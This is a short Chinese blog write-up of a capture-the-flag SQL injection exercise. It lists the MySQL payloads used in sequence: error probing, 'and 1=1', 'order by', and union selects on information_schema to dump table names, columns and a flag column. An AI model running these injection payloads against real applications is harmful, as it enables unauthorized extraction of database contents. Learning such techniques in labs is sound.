记录并总结一次简单的SQL注入实验——这个看起来有点简单!

哇迪�

于 2019-03-22 14:51:26 发布

阅读量766

点赞数

CC 4.0 BY-SA版权

文章标签： Web安全 SQL注入

本文链接：https://blog.youkuaiyun.com/Di_iii/article/details/88740387

博客围绕SQL注入展开，通过特定URL进行测试。利用不同的注入语句，如'id=%27'判断数据库类型为mysql，用'id=1 and 1=1'验证存在SQL注入，还使用'order by'、'union select'等语句进行查表名、列名及内容的操作，涉及数据库元数据信息查询。

http://www.shiyanbar.com/ctf/33

id=%27
报错，是mysql

id=1 and 1=1
正常，存在sql注入

id=1 order by 2

查表名
id=1%20union%20select%20null,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()
在这里插入图片描述注：
information_schema.tables存储了数据表的元数据信息；
table_schema: 记录数据库名；
table_name: 记录数据表名；
concat()与group_concat()详解：https://baijiahao.baidu.com/s?id=1595349117525189591&wfr=spider&for=pc

查thiskey表的列名
id=1 union select null,group_concat(column_name) from information_schema.columns where table_name=‘thiskey’
在这里插入图片描述
查内容
id=1 union select null,k0y from thiskey